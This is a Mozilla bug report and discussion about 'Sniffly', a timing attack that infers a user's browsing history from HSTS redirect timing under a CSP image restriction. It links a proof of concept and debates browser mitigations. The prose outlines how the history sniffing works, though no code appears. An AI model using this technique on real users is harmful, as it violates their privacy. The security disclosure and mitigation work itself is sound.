Open Bug 1218778 Opened 9 years ago Updated 1 year ago

Sniffly: a timing attack on HSTS to steal user's history

Categories

(Core :: Security, defect)

defect

Tracking

()

People

(Reporter: ehsan.akhgari, Unassigned)

References

(Blocks 1 open bug, )

Details

The trick that this uses is restricting image loads to http through CSP, and then loading an http image and timing how long it takes for the onerror event to be raised.  If the time is lower than a threshold, it concludes that the redirect didn't happen over the network, so it must be HSTS which indicates that the site has been visited.

In my testing, the demo is not super reliable, but it gave me correct results some times in non-e10s.  The results are much worse in e10s, presumably because of the way Necko works.

Should we do something about this, by making HSTS redirects take longer?
Flags: needinfo?(rlb)
Code for the proof of concept is here: https://github.com/diracdeltas/sniffly

Demonstration available here: http://zyan.scripts.mit.edu/sniffly/
Summary: sniffly: a timing attack on HSTS to steal user's history → Sniffly: a timing attack on HSTS to steal user's history
Moving to (non-crypto) Security, since it lies more in HSTS/CSP than it does in the networking code (which is working fine). If that's wrong, feel free to move it elsewhere.
Component: Networking: HTTP → Security
OS: Unspecified → All
Hardware: Unspecified → All
The HSTS redirect happens inside Necko...
(In reply to Ehsan Akhgari (don't ask for review please) from comment #0)
> Should we do something about this, by making HSTS redirects take longer?

Please also see:
https://bugzilla.mozilla.org/show_bug.cgi?id=1218524#c2
Some relevant Tor Browser tickets: https://trac.torproject.org/projects/tor/ticket/17423, https://trac.torproject.org/projects/tor/ticket/6458

I think the latter approach (double-key HSTS by first and third party origins) is worth considering for Firefox. It reduces HSTS's effectiveness but will prevent future HSTS supercookies like this.

-Yan
Blocks: 1218524
To put this in context, let's note that this is no worse than existing attacks that exploit cache timing.  Those are going to be present regardless of HSTS/CSP.

Yan, your suggestion makes me really uneasy.  I would really prefer if we could avoid reducing the scope of HSTS.  In addition to reducing the utility of HSTS, making that change would arguably violate the semantics of HSTS.

I think my preferred solution would be to simply remove "img-src http:" from the CSP spec, or at least explicitly allow HTTPS redirects.  After all, loading the image over non-secure HTTP means that you'll accept whatever the network gives you anyway, so there's no harm in accepting a redirect.  And it addresses this problem because you would never hit the error callback.
Flags: needinfo?(rlb)
It's worth noting that fixing this by removing "img-src http:" from CSP won't fix this other HSTS sniffing attack that does the same thing as Sniffly but slower: https://code.google.com/p/chromium/issues/detail?id=436451. I checked and it seems to still work in Firefox.
> Should we do something about this, by making HSTS redirects take longer?
There is still the "report-uri" field which makes for a slower but more reliable way to detect the same thing.
This approach is easily duplicated without HSTS by timing the load time of image logos, favicon.ico files, etc rather than the HSTS error response.

>> It's worth noting that fixing this by removing "img-src http:" from CSP won't fix this other HSTS sniffing attack that does the same thing as Sniffly but slower: https://code.google.com/p/chromium/issues/detail?id=436451. I checked and it seems to still work in Firefox.

And that Chrome bug is marked WontFix.
Why not to kill timing attacks on third-party domains allowing measuring time accurately only to the resources of allowed origins?
My quote from 1225066
>You mustn't be able to measure time it takes to load crossdomain resources. Because even if we block time api in the callback, it could be possible to create own timestamper, I suggest to artifically increase time to std distributed random value with mean=(average ping+size/average inet speed (among all the users of ff, this value is the same for everybody) ) and mse=(size/(3 inet speed)). Why not just use the same for everybody? Because it will allow to reliably distinguish between the case when the file is loaded longer than average time.
Is this really new? See https://tools.ietf.org/html/rfc6797#section-14.9, https://lists.w3.org/Archives/Public/public-webappsec/2014Sep/thread.html#msg108, and I believe there's several other potential attacks on the HSTS cache. When I last asked about this the goal was just to get as much sites on the HSTS preload list as possible until at some point we could invert the whole thing and have a list of sites that do not work over HTTPS yet.
>  I suggest to artifically increase time to std distributed random value

By simulating a delay to make cached assets appear to load at the same speed as assets loaded over the wire, you're effectively eliminating the client side benefit of caching (ie performance)

>  Why not to kill timing attacks on third-party domains allowing measuring time accurately only to the resources of allowed origins?

You'd have to kill all active timers in javascript on any asset load to accomplish this. The time measurement is not part of the request itself, but part of a script that watches activity.
>By simulating a delay to make cached assets appear to load at the same speed as assets loaded over the wire, you're effectively eliminating the client side benefit of caching (ie performance)
No, they are loaded and showed as fast, as possible, if they are in displayed, but js-observable changes like events or dom changes should be made only after the delay. Also note that this behavior is proposed only for different unallowed origins. RIA usually query the resources controled by the same owner which means that this delay won't affect RIA, even it was, it can be eliminated by setting correct permissions.

>You'd have to kill all active timers in javascript on any asset load to accomplish this. The time measurement is not part of the request itself, but part of a script that watches activity.

I propose the solution meant to kill all timing-attacks on fingerprinting origins which shouldn't kill the most of RIA. I think eliminating this attack worth a little short-time problems for minority of RIA.
*if they are in displayable part of DOM
>You'd have to kill all active timers in javascript on any asset load to accomplish this.
No, the all you need to do is to have 2 different DOMs (one is for rendering, one is for js) and delay all the events for restricted objects. I mean make js-observable dom look like it really took so long to load and delay all the events.
*all the events r3lated to restricted object.
> Also note that this behavior is proposed only for different unallowed origins.

I was referring the the equivalent non-HSTS vector, but perhaps that should be discussed elsewhere.  The assets being tested are generally going to be unrestricted by origin e.g. img and js loads.

And the concern isn't related solely to cross-origin requests, it's related to user privacy. Privacy could still be compromised by scripts on the same origin e.g to determine if a user who cleared cookies ever visited before. 

Also, there can be a major impact to load and startup animations by deferring all js events.
>The assets being tested are generally going to be unrestricted by origin e.g. img and js loads.
Loads are not restricted, getting accurate timing through js should be restricted. For example we have xdomain img.If it has been loaded faster then computed time, the browser should show it immediately, but js should behave (for examle getBoundingClientRect api) like it haven't been loaded yet, until the time had come.

>Privacy could still be compromised by scripts on the same origin e.g to determine if a user who cleared cookies ever visited before.

As I know, mozilla haven't merged the patches by torproject to prevent canvas fingerprinting. And the problem here is not only fingerprinting, but disclosure of information the site mustn't be able to get.
Severity: normal → S3
You need to log in before you can comment on or make changes to this bug.